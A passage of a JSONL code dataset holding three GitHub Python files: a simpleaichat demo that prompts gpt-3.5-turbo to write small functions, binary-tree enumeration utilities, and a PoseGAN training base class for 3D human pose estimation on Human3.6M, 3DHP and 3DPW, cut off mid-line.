+{"seq_id":"18838039306","text":"from pydantic import BaseModel, Field\nfrom simpleaichat import AIChat\nfrom uuid import uuid4\nimport orjson\n\nparams = {\"temperature\": 0.0} \nmodel = \"gpt-3.5-turbo\"\n\nsystem_optimized = \"\"\"Write a Python function based on the user input.\n\nYou must obey ALL the following rules:\n- Only respond with the Python function.\n- Never put in-line comments or docstrings in your code.\"\"\"\n\n\nai_func = AIChat(console=False)\n\nclass write_python_function(BaseModel):\n \"\"\"Writes a Python function based on the user input.\"\"\"\n code: str = Field(description=\"Python code\")\n efficient_code: str = Field(description=\"More efficient Python code than previously written\")\n\ndef gen_code(question):\n id = uuid4()\n ai_func.new_session(id=id, system=system_optimized, params=params, model=model)\n response_structured = ai_func(question, id=id, output_schema=write_python_function)\n \n ai_func.delete_session(id=id)\n return response_structured\n\ncode = gen_code(\"is_palindrome\")\n# print(orjson.dumps(code, option=orjson.OPT_INDENT_2).decode())\nprint(code[\"efficient_code\"])\nprint(\"\\n\\n\")\n\n\ncode = gen_code(\"multiprocess hash\")\nprint(code[\"efficient_code\"])\nprint(\"\\n\\n\")\n\ncode = gen_code(\"reverse string\")\nprint(code[\"efficient_code\"])\nprint(\"\\n\\n\")\n","repo_name":"flyq/llm_demo","sub_path":"simpleaichat/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"14215519161","text":"import copy\n\nfrom src.single_tree.development_tree import Axis, TreeNode, NONE_NODE\n\n\n# Returns the number with the highest bit only\n# 0 -> 0\n# 1 -> 1\n# 2 -> 2\n# 3 -> 2\n# ...\n# 255 -> 128\n# 256 -> 256\n# ...\ndef hi_bit(n):\n n |= (n >> 1)\n n |= (n >> 2)\n n |= (n >> 4)\n n |= (n >> 8)\n n |= (n >> 16)\n n |= (n >> 32)\n return n - (n >> 1)\n\n\n# Iterates over all chains of the full binary tree of the height 'max_level'\ndef get_address(number):\n if number == 0:\n return \"\"\n res = \"Z\"\n cur_mask = hi_bit(number) >> 1\n while cur_mask > 0:\n res += (\".L\" if cur_mask & number == 0 else \".R\")\n cur_mask >>= 1\n return res\n\n\n# Returns a chain in the infinite full binary tree by number\n# Each chain the infinite full binary tree has a unique number\n# (There is a bijection between numbers 0..inf and chains)\ndef get_chain(number):\n if number == 0:\n return NONE_NODE\n root = TreeNode(address=\"Z\", axis=Axis.X)\n root.left = NONE_NODE\n root.right = NONE_NODE\n\n # iterate over bits from the highest to the 0th\n cur_node = root\n cur_mask = hi_bit(number) >> 1\n while cur_mask > 0:\n if cur_mask & number == 0:\n cur_node.left = TreeNode(address=cur_node.address + \".L\", axis=Axis.X, left=NONE_NODE, right=NONE_NODE)\n cur_node = cur_node.left\n else:\n cur_node.right = TreeNode(address=cur_node.address + \".R\", axis=Axis.X, left=NONE_NODE, right=NONE_NODE)\n cur_node = cur_node.right\n cur_mask >>= 1\n return root\n\n\n# Iterates over all subtrees of the binary tree 'node'\ndef get_subtrees(node):\n yield NONE_NODE # no node\n if not node.is_none():\n left_nodes = [x for x in get_subtrees(node.left)]\n right_nodes = [x for x in get_subtrees(node.right)]\n for left_node in left_nodes:\n for right_node in right_nodes:\n copy_node = copy.copy(node)\n copy_node.left = left_node\n copy_node.right = right_node\n if copy_node.left.is_none() and copy_node.right.is_none():\n copy_node.axis = Axis.NONE\n yield copy_node\n\n\n# Generates a full bin tree of height 'max_level'\ndef generate_bin_tree(max_level, address=\"Z\", reduced_level=0):\n if max_level == 0:\n return NONE_NODE\n\n node = TreeNode(axis=Axis.X, address=address, reduced_address=address, reduced_level=reduced_level, left=NONE_NODE, right=NONE_NODE)\n node.left = generate_bin_tree(max_level - 1, address + \".L\", reduced_level + 1)\n node.right = generate_bin_tree(max_level - 1, address + \".R\", reduced_level + 1)\n return node\n\n\ndef get_deepest_node(node):\n if node.is_none():\n return node\n\n if not node.left.is_none():\n return get_deepest_node(node.left)\n\n if not node.right.is_none():\n return get_deepest_node(node.right)\n\n return node\n\n\ndef iterate_nodes(node1, node2):\n if not (node1.left.is_none() and node2.left.is_none()):\n for x in iterate_nodes(node1.left, node2.left):\n yield x\n yield [node1, node2]\n if not (node1.right.is_none() and node2.right.is_none()):\n for x in iterate_nodes(node1.right, node2.right):\n yield x\n\n\n# Returns number of the node at the level\n# left to right direction\n#\n# root - the root of the tree\n# address - address of the node\n# is_reduced - True to use reduced tree attributes, False to use \"raw\" tree attributes\ndef number_by_address(root1, root2, address, is_reducing):\n level = int(len(address) / 2)\n\n nodes_at_level = [x for x in filter(lambda x: (x[0].reduced_level == level and not x[0].is_none()) or (x[1].reduced_level == level and not x[1].is_none()),\n iterate_nodes(root1, root2))]\n\n for i, [item1, item2] in enumerate(nodes_at_level):\n if (item1.reduced_address == address and not item1.is_none()) or (item2.reduced_address == address and not item2.is_none()):\n return i + 1\n return None # not found\n\n# for i in range(16):\n# subtree = get_chain(i)\n# print(f\"{i} - {get_address(i)} - {'()' if subtree is None else get_deepest_node(subtree)}\")\n\n\n# for level in range(6):\n# root = generate_bin_tree(level)\n# #print(f\"root: {'()' if root is None else root.full_tree_str()}\")\n# count = 0\n# for subtree in get_subtrees(root):\n# #print(f\"{'()' if subtree is None else subtree.full_tree_str()}\")\n# count += 1\n#\n# print(f\"level: {level}, count: {count}\")\n","repo_name":"npakudin/embrionic_tree","sub_path":"src/multiple_trees/iterate_trees.py","file_name":"iterate_trees.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"75237084034","text":"import os\nimport os.path as path\nimport pickle\nfrom time import time\n\nimport numpy as np\nimport torch\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom tqdm import tqdm\n\nfrom common.camera import *\nfrom common.generators import ChunkedGenerator, UnchunkedGenerator, ChunkedNoPadGeneratorV5\nfrom common.loss import *\nfrom common.model import *\nfrom common.utils import deterministic_random\nfrom function.gan_utils import pose_seq_bl_aug\nfrom function.logger import create_logger\nfrom function.utils import Summary, get_scheduler, get_discriminator_accuracy, Sample_from_Pool, get_contacts\n\n'''\nbasement class\n'''\n\n\nclass PoseGANBasement(object):\n def __init__(self, args):\n # init param\n self.device = torch.device(\"cuda\")\n self.args = args\n\n # define checkpoint directory # Create checkpoint directory if it does not exist\n # self.args.checkpoint = path.join(self.args.checkpoint, self.args.note,\n # datetime.datetime.now().strftime('%m%d%H%M%S'))\n self.args.checkpoint = path.join(self.args.checkpoint, self.args.note)\n print('INFO: creat log folder at {}'.format(self.args.checkpoint))\n os.makedirs(self.args.checkpoint, exist_ok=True)\n os.makedirs(os.path.join(self.args.checkpoint, 'ckpt'), exist_ok=True)\n\n # prepare monitor\n # Init monitor for net work training\n #########################################################\n self.summary = Summary(self.args.checkpoint)\n self.writer = self.summary.create_summary()\n self.logger = create_logger(os.path.join(self.args.checkpoint, 'log.txt'))\n self.logger.info(args)\n\n def logging(self, val_rlt, epoch_start_time):\n \"\"\"\n recording the process of posenet, and saving model.\n \"\"\"\n lr = self.optimizer_P.param_groups[0]['lr']\n losses_str = ' '.join(['{}: {:.4f}'.format(val_set_key, val_rlt[val_set_key]['p1']) \\\n for val_set_key in val_rlt])\n dt = (time() - epoch_start_time) / 60\n self.logger.info(\n '====> Epoch: {} Time: {:.2f} min {} lr: {:.5f}'.format(self.summary.epoch, dt, losses_str, lr))\n\n # record the result list and save ckpt\n if self.summary.epoch <= 2:\n self.h36m_p1_s911 = []\n self.h36m_p1_s911.append(val_rlt['s911']['p1'])\n # Save checkpoint if necessary\n if self.h36m_p1_s911[-1] == min(self.h36m_p1_s911):\n ckpt_path = os.path.join(self.args.checkpoint, 'ckpt', 'best_ckpt_S911.bin')\n self.logger.info('Saving checkpoint to{}'.format(ckpt_path))\n torch.save({\n 'model_pos': self.model_pos_train.state_dict(),\n 'model_traj': self.model_traj_train.state_dict(),\n }, ckpt_path)\n\n if self.summary.epoch % 5 == 0:\n ckpt_path = os.path.join(self.args.checkpoint, 'ckpt', 'ckpt_ep_{:0>3d}.bin'.format(self.summary.epoch))\n self.logger.info('Saving checkpoint to{}'.format(ckpt_path))\n torch.save({\n 'model_pos': self.model_pos_train.state_dict(),\n 'model_traj': self.model_traj_train.state_dict(),\n }, ckpt_path)\n\n def data_preparation(self):\n ###################################\n # prepare data\n ###################################\n self.logger.info('Loading dataset...')\n dataset_path = 'data/data_3d_' + self.args.dataset + '.npz'\n if self.args.dataset == 'h36m':\n from common.h36m_dataset import Human36mDataset\n self.dataset = Human36mDataset(dataset_path)\n else:\n raise KeyError('Invalid dataset')\n\n self.logger.info('Preparing dataset...')\n for subject in self.dataset.subjects():\n for action in self.dataset[subject].keys():\n anim = self.dataset[subject][action]\n\n if 'positions' in anim:\n positions_3d = []\n for cam in anim['cameras']:\n pos_3d = world_to_camera(anim['positions'], R=cam['orientation'], t=cam['translation'])\n # pos_3d[:, 1:] -= pos_3d[:, :1] # Remove global offset, but keep trajectory in first position, no, keep here\n positions_3d.append(pos_3d) # T x J x 3\n anim['positions_3d'] = positions_3d\n\n if 'positions' in anim:\n contact_labels = []\n for cam in anim['cameras']:\n contact_label = get_contacts(anim['positions'])\n contact_labels.append(contact_label) # T x 2 x 1\n anim['contact_labels'] = contact_labels\n\n self.keypoints_preparation()\n\n def keypoints_preparation(self):\n # 2D keypoint\n self.logger.info('Loading 2D detections...')\n self.keypoints = np.load('data/data_2d_' + self.args.dataset + '_' + self.args.keypoints + '.npz',\n allow_pickle=True)\n # keypoints_metadata = self.keypoints['metadata'].item()\n keypoints_metadata = {'num_joints': 16,\n 'keypoints_symmetry': [[4, 5, 6, 10, 11, 12], [1, 2, 3, 13, 14, 15]]}\n\n keypoints_symmetry = keypoints_metadata['keypoints_symmetry']\n self.kps_left, self.kps_right = list(keypoints_symmetry[0]), list(keypoints_symmetry[1])\n self.joints_left, self.joints_right = list(self.dataset.skeleton().joints_left()), list(\n self.dataset.skeleton().joints_right())\n self.keypoints = self.keypoints['positions_2d'].item()\n\n for subject in self.dataset.subjects():\n assert subject in self.keypoints, 'Subject {} is missing from the 2D detections dataset'.format(subject)\n for action in self.dataset[subject].keys():\n assert action in self.keypoints[\n subject], 'Action {} of subject {} is missing from the 2D detections dataset'.format(action,\n subject)\n if 'positions_3d' not in self.dataset[subject][action]:\n continue\n\n for cam_idx in range(len(self.keypoints[subject][action])):\n\n # We check for >= instead of == because some videos in H3.6M contain extra frames\n mocap_length = self.dataset[subject][action]['positions_3d'][cam_idx].shape[0]\n assert self.keypoints[subject][action][cam_idx].shape[0] >= mocap_length\n\n if self.keypoints[subject][action][cam_idx].shape[0] > mocap_length:\n # Shorten sequence\n self.keypoints[subject][action][cam_idx] = self.keypoints[subject][action][cam_idx][\n :mocap_length]\n\n assert len(self.keypoints[subject][action]) == len(self.dataset[subject][action]['positions_3d'])\n\n # norm keypoint\n for subject in self.keypoints.keys():\n for action in self.keypoints[subject]:\n for cam_idx, kps in enumerate(self.keypoints[subject][action]):\n # Normalize camera frame\n cam = self.dataset.cameras()[subject][cam_idx]\n kps[..., :2] = normalize_screen_coordinates(kps[..., :2], w=cam['res_w'], h=cam['res_h'])\n self.keypoints[subject][action][cam_idx] = kps\n\n def fetch(self, subjects, action_filter=None, subset=1, parse_3d_poses=True):\n out_poses_3d = []\n out_poses_2d = []\n out_camera_params = []\n out_camera_rtparams = []\n out_contact_labels = []\n for subject in subjects:\n for action in self.keypoints[subject].keys():\n if action_filter is not None:\n found = False\n for a in action_filter:\n if action.startswith(a):\n found = True\n break\n if not found:\n continue\n\n poses_2d = self.keypoints[subject][action]\n for i in range(len(poses_2d)): # Iterate across cameras\n out_poses_2d.append(poses_2d[i])\n\n if subject in self.dataset.cameras():\n cams = self.dataset.cameras()[subject]\n assert len(cams) == len(poses_2d), 'Camera count mismatch'\n for cam in cams:\n if 'intrinsic' in cam:\n out_camera_params.append(cam['intrinsic'])\n if 'extrinsic' in cam:\n out_camera_rtparams.append(cam['extrinsic'])\n\n if parse_3d_poses and 'positions_3d' in self.dataset[subject][action]:\n poses_3d = self.dataset[subject][action]['positions_3d']\n assert len(poses_3d) == len(poses_2d), 'Camera count mismatch'\n for i in range(len(poses_3d)): # Iterate across cameras\n out_poses_3d.append(poses_3d[i])\n\n # for contact labels, same as poses_3d\n if parse_3d_poses and 'contact_labels' in self.dataset[subject][action]:\n contact_labels = self.dataset[subject][action]['contact_labels']\n assert len(contact_labels) == len(poses_2d), 'Camera count mismatch'\n for i in range(len(contact_labels)): # Iterate across cameras\n out_contact_labels.append(contact_labels[i])\n\n if len(out_camera_params) == 0:\n assert False\n if len(out_camera_rtparams) == 0:\n assert False\n if len(out_poses_3d) == 0:\n assert False\n if len(out_contact_labels) == 0:\n assert False\n\n stride = self.args.downsample\n if subset < 1:\n for i in range(len(out_poses_2d)):\n n_frames = int(round(len(out_poses_2d[i]) // stride * subset) * stride)\n start = deterministic_random(0, len(out_poses_2d[i]) - n_frames + 1, str(len(out_poses_2d[i])))\n out_poses_2d[i] = out_poses_2d[i][start:start + n_frames:stride]\n if out_poses_3d is not None:\n out_poses_3d[i] = out_poses_3d[i][start:start + n_frames:stride]\n elif stride > 1:\n # Downsample as requested\n for i in range(len(out_poses_2d)):\n out_poses_2d[i] = out_poses_2d[i][::stride]\n if out_poses_3d is not None:\n out_poses_3d[i] = out_poses_3d[i][::stride]\n out_contact_labels[i] = out_contact_labels[i][::stride]\n\n return out_camera_params, out_camera_rtparams, out_poses_3d, out_poses_2d, out_contact_labels\n\n def dataloader_preparation(self):\n action_filter = None if self.args.actions == '*' else self.args.actions.split(',')\n if action_filter is not None:\n self.logger.info('Selected actions:{}'.format(action_filter))\n\n ###################################\n # train subject # test subject\n ###################################\n subjects_train = self.args.subjects_train.split(',')\n subjects_test = self.args.subjects_test.split(',')\n\n cameras_train, cam_rt_train, poses_train, poses_train_2d, contact_train = self.fetch(subjects_train,\n action_filter,\n subset=self.args.subset)\n cameras_valid, cam_rt_valid, poses_valid, self.poses_valid_2d, contact_valid = self.fetch(subjects_test,\n action_filter)\n causal_shift = 0\n self.pad = (np.prod([int(x) for x in self.args.architecture.split(',')]) - 1) // 2\n self.rf = np.prod([int(x) for x in self.args.architecture.split(',')])\n\n\n ##################################################################\n ##### linkstart: load expert,\n ##################################################################\n self.logger.info('INFO: self.args.expert_dict_path: {}'.format(self.args.expert_dict_path))\n if self.args.expert_dict_path is None:\n expert_dict = {'h36m_take_000':{'skt_wpos':np.ones((500, 16, 3))}}\n take_list = ['h36m_take_000']\n else:\n expert_feat_file = self.args.expert_dict_path\n expert_dict = pickle.load(open(expert_feat_file, 'rb'))\n # take_list = [take for take in expert_dict if expert_dict[take]['t_num_reset'] == 0] # maybe filter some\n take_list = ['h36m_take_{:0>3d}'.format(i) for i in range(600)]\n\n # load expert from rib-rl\n self.logger.info('INFO: self.args.extra_expert_dict_path: {}'.format(self.args.extra_expert_dict_path))\n if self.args.extra_expert_dict_path is None:\n extra_expert_dict = None\n extra_take_list = []\n else:\n extra_expert_feat_file = self.args.extra_expert_dict_path\n extra_expert_dict = pickle.load(open(extra_expert_feat_file, 'rb'))\n extra_take_list = [take for take in extra_expert_dict if extra_expert_dict[take]['t_num_reset'] == 0]\n\n ######################################################################\n # prepare a basement for every epoch update\n self.fixed_fake_database = {\n 'cam_rt_train': cam_rt_train,\n 'cameras_train': cameras_train,\n 'take_list': take_list,\n 'expert_dict': expert_dict,\n 'causal_shift': causal_shift,\n 'extra_expert_dict': extra_expert_dict,\n 'extra_take_list': extra_take_list,\n }\n\n\n skt_pos_train = []\n skt_pos_train_2dtarget = []\n\n for i, take in enumerate(take_list):\n # assume expert is less and shorter than h36m.\n skt_pos_train.append(world2cam_sktpos(expert_dict[take]['skt_wpos']))\n # skt_pos_train.append(world2cam_sktpos(reset_spine(expert_dict[take]['skt_wpos'])))\n skt_pos_train_2dtarget.append(poses_train_2d[i][10:expert_dict[take]['skt_wpos'].shape[0] + 10])\n\n ########################################################################################\n # extra\n for i, take in enumerate(extra_take_list):\n # assume expert is less and shorter than h36m.\n skt_pos_train.append(world2cam_sktpos(extra_expert_dict[take]['skt_wpos']))\n # skt_pos_train.append(world2cam_sktpos(reset_spine(extra_expert_dict[take]['skt_wpos'])))\n skt_pos_train_2dtarget.append(poses_train_2d[i%len(poses_train_2d)][10:extra_expert_dict[take]['skt_wpos'].shape[0] + 10])\n ########################################################################################\n\n # prepare data for augmenting\n aug_pad = self.pad\n self.aug_generator = ChunkedNoPadGeneratorV5(self.args.batch_size // self.args.stride, None, None,\n skt_pos_train, skt_pos_train_2dtarget, None, self.args.stride,\n pad=aug_pad, causal_shift=causal_shift, shuffle=True,\n # augment=True,\n augment=self.args.data_augmentation,\n kps_left=self.kps_left, kps_right=self.kps_right,\n joints_left=self.joints_left, joints_right=self.joints_right)\n self.logger.info('INFO: aug-supervision on {} frames'.format(self.aug_generator.num_frames()))\n self.fake_cam_sample = Sample_from_Pool(max_elements=self.args.batch_size)\n\n # train loader s15678 eval\n train_generator_eval = UnchunkedGenerator(cam_rt_train, poses_train, poses_train_2d,\n pad=self.pad, causal_shift=causal_shift, augment=False,\n kps_left=self.kps_left, kps_right=self.kps_right,\n joints_left=self.joints_left,\n joints_right=self.joints_right)\n self.logger.info('INFO: Testing on {} frames > train_generator_eval'.format(train_generator_eval.num_frames()))\n train_generator_eval_flip = UnchunkedGenerator(cam_rt_train, poses_train, poses_train_2d,\n pad=self.pad, causal_shift=causal_shift, augment=True,\n kps_left=self.kps_left, kps_right=self.kps_right,\n joints_left=self.joints_left,\n joints_right=self.joints_right)\n self.logger.info('INFO: Testing on {} frames > train_generator_eval_flip'.format(train_generator_eval_flip.num_frames()))\n # test loader -- S911\n test_generator_s911 = UnchunkedGenerator(None, poses_valid, self.poses_valid_2d,\n pad=self.pad, causal_shift=causal_shift, augment=False,\n kps_left=self.kps_left, kps_right=self.kps_right,\n joints_left=self.joints_left,\n joints_right=self.joints_right)\n self.logger.info('INFO: Testing on {} frames > test_generator_s911'.format(test_generator_s911.num_frames()))\n test_generator_s911_flip = UnchunkedGenerator(None, poses_valid, self.poses_valid_2d,\n pad=self.pad, causal_shift=causal_shift, augment=True,\n kps_left=self.kps_left, kps_right=self.kps_right,\n joints_left=self.joints_left,\n joints_right=self.joints_right)\n self.logger.info('INFO: Testing on {} frames > test_generator_s911_flip'.format(test_generator_s911_flip.num_frames()))\n\n # test loader -- 3DHP # all frame are used.\n pkl_path = './data_cross/3dhp/3dhp_testset_bySub.pkl'\n test_generator_3dhp = self._dataloader_preparation(pkl_path=pkl_path,\n key_2d='valid_kps_2d_imgnorm',\n key_3d='valid_kps_3d',\n clip_flg=True)\n test_generator_3dhp_flip = self._dataloader_preparation(pkl_path=pkl_path,\n key_2d='valid_kps_2d_imgnorm',\n key_3d='valid_kps_3d',\n clip_flg=True,\n test_augment=True)\n # test loader -- 3DPWD\n pkl_path = './data_cross/3dpw/3dpw_testset_bySub.pkl'\n test_generator_3dpw = self._dataloader_preparation(pkl_path=pkl_path,\n key_2d='joints_2d_imgnorm',\n key_3d='valid_kps_3d',\n clip_flg=True)\n test_generator_3dpw_flip = self._dataloader_preparation(pkl_path=pkl_path,\n key_2d='joints_2d_imgnorm',\n key_3d='valid_kps_3d',\n clip_flg=True,\n test_augment=True)\n\n ############################\n ## place all test loader together\n ############################\n self.val_generator_dict = {\n 's15678': train_generator_eval,\n 's15678_flip': train_generator_eval_flip,\n 's911': test_generator_s911,\n 's911_flip': test_generator_s911_flip,\n '3dhp': test_generator_3dhp,\n '3dhp_flip': test_generator_3dhp_flip,\n '3dpw': test_generator_3dpw,\n '3dpw_flip': test_generator_3dpw_flip,\n }\n\n def _dataloader_preparation(self, pkl_path, key_2d, key_3d, clip_flg, scale2d=1., test_augment=False):\n \"\"\"\n dataloader for cross data\n \"\"\"\n with open(pkl_path, 'rb') as fp:\n self.logger.info('load from pickle file -> {}'.format(pkl_path))\n tmp_npdict = pickle.load(fp)\n poses_3d = []\n poses_2d = []\n # clip_flg = True\n # [..., :2] for 2D is to remove the confidence channel.\n for sub in tmp_npdict:\n if clip_flg:\n for clip_idx in tmp_npdict[sub]['clip_idx']:\n poses_3d.append(tmp_npdict[sub][key_3d][clip_idx[0]:clip_idx[1]])\n poses_2d.append(tmp_npdict[sub][key_2d][clip_idx[0]:clip_idx[1]][..., :2] * scale2d)\n else:\n poses_3d.append(tmp_npdict[sub][key_3d])\n poses_2d.append(tmp_npdict[sub][key_2d][..., :2] * scale2d)\n\n test_generator = UnchunkedGenerator(cameras=None, poses_3d=poses_3d, poses_2d=poses_2d,\n pad=self.pad, causal_shift=0, augment=test_augment,\n kps_left=self.kps_left, kps_right=self.kps_right,\n joints_left=self.joints_left,\n joints_right=self.joints_right)\n self.logger.info('INFO: Testing on {} frames'.format(test_generator.num_frames()))\n return test_generator\n\n def s911_detect2d_dataloader_preparation(self):\n for det2d in ['hr']:\n self.logger.info('INFO: load s911 det2d: {}'.format(det2d))\n self.args.keypoints = det2d\n self.keypoints_preparation()\n self._s911_detect2d_dataloader_preparation(det2d)\n\n def _s911_detect2d_dataloader_preparation(self, det2d):\n causal_shift = 0\n action_filter = None if self.args.actions == '*' else self.args.actions.split(',')\n subjects_test = self.args.subjects_test.split(',')\n\n cameras_valid, cam_rt_valid, poses_valid, poses_valid_2d, contact_valid = self.fetch(subjects_test,\n action_filter)\n\n # test loader -- S911\n test_generator_s911 = UnchunkedGenerator(None, poses_valid, poses_valid_2d,\n pad=self.pad, causal_shift=causal_shift, augment=False,\n kps_left=self.kps_left, kps_right=self.kps_right,\n joints_left=self.joints_left,\n joints_right=self.joints_right)\n self.logger.info('INFO: Testing on {} frames > test_generator_s911 > det2d:{}'.format(test_generator_s911.num_frames(), det2d))\n test_generator_s911_flip = UnchunkedGenerator(None, poses_valid, poses_valid_2d,\n pad=self.pad, causal_shift=causal_shift, augment=True,\n kps_left=self.kps_left, kps_right=self.kps_right,\n joints_left=self.joints_left,\n joints_right=self.joints_right)\n self.logger.info(\n 'INFO: Testing on {} frames > test_generator_s911_flip > det2d:{}'.format(test_generator_s911_flip.num_frames(), det2d))\n\n self.val_generator_dict['S911_{}'.format(det2d)] = test_generator_s911\n self.val_generator_dict['S911_flip_{}'.format(det2d)] = test_generator_s911_flip\n\n def update_fixedfake_train_generator(self):\n \"\"\"\n update dataloader for each epoch\n include bone length augmentation and z-axis rotation\n \"\"\"\n cam_rt_train = self.fixed_fake_database['cam_rt_train']\n cameras_train = self.fixed_fake_database['cameras_train']\n take_list = self.fixed_fake_database['take_list']\n expert_dict = self.fixed_fake_database['expert_dict']\n causal_shift = self.fixed_fake_database['causal_shift']\n extra_expert_dict = self.fixed_fake_database['extra_expert_dict'] # extra for boost exp\n extra_take_list = self.fixed_fake_database['extra_take_list'] # extra for boost exp\n\n fixed_fake_cam_rt_train = []\n fixed_fake_poses_train = []\n fixed_fake_poses_train_2d = []\n for i, take in enumerate(take_list):\n cam_ex = cam_rt_train[i]\n fixed_fake_cam_rt_train.append(cam_ex)\n\n tmp_skt_wpos = expert_dict[take]['skt_wpos'].reshape(-1, 16, 3).astype('float32')\n tmp_skt_wpos = zaxis_randrotation(tmp_skt_wpos)\n tmp_skt_wpos = pose_seq_bl_aug(torch.from_numpy(tmp_skt_wpos)).numpy()\n fixed_fake_poses_camed = world_to_camera_sktpos_v3(tmp_skt_wpos, self.args)\n fixed_fake_poses_train.append(fixed_fake_poses_camed)\n cam_ix = cameras_train[i]\n cam_ix_tf = torch.from_numpy(np.tile(cam_ix, (fixed_fake_poses_camed.shape[0], 1)))\n fixed_fake_poses_train_2d.append(\n project_to_2d_purelinear(fixed_fake_poses_camed))\n\n ############################################################\n # extra\n for i, take in enumerate(extra_take_list):\n i = i % len(cam_rt_train)\n cam_ex = cam_rt_train[i]\n fixed_fake_cam_rt_train.append(cam_ex)\n\n tmp_skt_wpos = extra_expert_dict[take]['skt_wpos'].reshape(-1, 16, 3).astype('float32')\n tmp_skt_wpos = zaxis_randrotation(tmp_skt_wpos)\n tmp_skt_wpos = pose_seq_bl_aug(torch.from_numpy(tmp_skt_wpos)).numpy()\n fixed_fake_poses_camed = world_to_camera_sktpos_v3(tmp_skt_wpos, self.args)\n fixed_fake_poses_train.append(fixed_fake_poses_camed)\n cam_ix = cameras_train[i]\n cam_ix_tf = torch.from_numpy(np.tile(cam_ix, (fixed_fake_poses_camed.shape[0], 1)))\n fixed_fake_poses_train_2d.append(\n project_to_2d_purelinear(fixed_fake_poses_camed))\n ########################################################################################\n\n self.train_generator = ChunkedGenerator(self.args.batch_size // self.args.stride, None,\n fixed_fake_poses_train,\n fixed_fake_poses_train_2d, self.args.stride,\n pad=self.pad, causal_shift=causal_shift, shuffle=True,\n augment=self.args.data_augmentation,\n # augment=False,\n kps_left=self.kps_left, kps_right=self.kps_right,\n joints_left=self.joints_left, joints_right=self.joints_right)\n self.logger.info('INFO: Training on {} frames'.format(self.train_generator.num_frames()))\n\n def _count_param(self, model, name):\n # print param number size.\n model_params = 0\n for parameter in model.parameters():\n model_params += parameter.numel()\n self.logger.info('INFO: Trainable parameter count for model {} is:{}'.format(name, model_params))\n\n def _model_preparation_pos(self):\n ######################################\n # prepare model: posenet: 2d pose -> 3d pose\n ######################################\n filter_widths = [int(x) for x in self.args.architecture.split(',')]\n if not self.args.disable_optimizations and not self.args.dense and self.args.stride == 1:\n # Use optimized model for single-frame predictions\n self.model_pos_train = TemporalModelOptimized1f(self.poses_valid_2d[0].shape[-2],\n self.poses_valid_2d[0].shape[-1],\n self.dataset.skeleton().num_joints(),\n filter_widths=filter_widths, causal=self.args.causal,\n dropout=self.args.dropout, channels=self.args.channels)\n else:\n # When incompatible settings are detected (stride > 1, dense filters, or disabled optimization) fall back to normal model\n self.model_pos_train = TemporalModel(self.poses_valid_2d[0].shape[-2],\n self.poses_valid_2d[0].shape[-1],\n self.dataset.skeleton().num_joints(),\n filter_widths=filter_widths, causal=self.args.causal,\n dropout=self.args.dropout, channels=self.args.channels,\n dense=self.args.dense)\n # model for eval\n self.model_pos = TemporalModel(self.poses_valid_2d[0].shape[-2],\n self.poses_valid_2d[0].shape[-1],\n self.dataset.skeleton().num_joints(),\n filter_widths=filter_widths, causal=self.args.causal, dropout=self.args.dropout,\n channels=self.args.channels, dense=self.args.dense)\n\n ##################################\n ##################################\n\n receptive_field = self.model_pos.receptive_field()\n self.logger.info('INFO: Receptive field: {} frames'.format(receptive_field))\n pad_check = (receptive_field - 1) // 2 # Padding on each side\n assert pad_check == self.pad, 'pad mismatch'\n\n # print param number size.\n self._count_param(self.model_pos_train, 'self.model_pos_train')\n\n self.model_pos = self.model_pos.cuda()\n self.model_pos_train = self.model_pos_train.cuda()\n\n ###################################\n # optimizer.\n ###################################\n self.optimizer_P = torch.optim.Adam(self.model_pos_train.parameters(), lr=self.args.learning_rate)\n\n self.lr_scheduler_P = get_scheduler(self.optimizer_P, policy='lambda', nepoch_fix=0, nepoch=self.args.epochs)\n\n ###################################\n # load pretrain\n ###################################\n if self.args.pretrain:\n ckpt_path = self.args.evaluate\n self.logger.info('Loading checkpoint at {}'.format(ckpt_path))\n checkpoint = torch.load(ckpt_path, map_location=lambda storage, loc: storage)\n self.model_pos_train.load_state_dict(checkpoint['model_pos'])\n self.model_pos.load_state_dict(checkpoint['model_pos'])\n\n def _model_preparation_traj(self):\n ######################################\n # prepare: posenet: 2d pose -> 3d traj\n ######################################\n filter_widths = [int(x) for x in self.args.architecture.split(',')]\n if not self.args.disable_optimizations and not self.args.dense and self.args.stride == 1:\n # Use optimized model for single-frame predictions\n self.model_traj_train = TemporalModelOptimized1f(self.poses_valid_2d[0].shape[-2],\n self.poses_valid_2d[0].shape[-1],\n 1,\n filter_widths=filter_widths, causal=self.args.causal,\n dropout=self.args.dropout, channels=self.args.channels)\n else:\n # When incompatible settings are detected (stride > 1, dense filters, or disabled optimization) fall back to normal model\n self.model_traj_train = TemporalModel(self.poses_valid_2d[0].shape[-2],\n self.poses_valid_2d[0].shape[-1],\n 1,\n filter_widths=filter_widths, causal=self.args.causal,\n dropout=self.args.dropout, channels=self.args.channels,\n dense=self.args.dense)\n # model for eval\n self.model_traj = TemporalModel(self.poses_valid_2d[0].shape[-2],\n self.poses_valid_2d[0].shape[-1],\n 1,\n filter_widths=filter_widths, causal=self.args.causal, dropout=self.args.dropout,\n channels=self.args.channels, dense=self.args.dense)\n\n ##################################\n ##################################\n\n receptive_field = self.model_traj.receptive_field()\n self.logger.info('INFO: Receptive field: {} frames'.format(receptive_field))\n pad_check = (receptive_field - 1) // 2 # Padding on each side\n assert pad_check == self.pad, 'pad mismatch'\n\n # print param number size.\n self._count_param(self.model_traj_train, 'self.model_traj_train')\n\n self.model_traj = self.model_traj.cuda()\n self.model_traj_train = self.model_traj_train.cuda()\n\n ###################################\n # optimizer.\n ###################################\n self.optimizer_T = torch.optim.Adam(self.model_traj_train.parameters(), lr=self.args.learning_rate)\n\n self.lr_scheduler_T = get_scheduler(self.optimizer_T, policy='lambda', nepoch_fix=0, nepoch=self.args.epochs)\n\n ###################################\n # load pretrain\n ###################################\n if self.args.pretrain:\n ckpt_path = self.args.evaluate\n self.logger.info('Loading checkpoint at {}'.format(ckpt_path))\n checkpoint = torch.load(ckpt_path, map_location=lambda storage, loc: storage)\n self.model_traj_train.load_state_dict(checkpoint['model_traj'])\n self.model_traj.load_state_dict(checkpoint['model_traj'])\n\n def _model_preparation_Gcam(self):\n ######################################\n # prepare model: Gcam: 3d pose -> 3d pose, 2d pose, different cam.\n ######################################\n if self.args.gcam_choice == 'gcam_v0':\n from 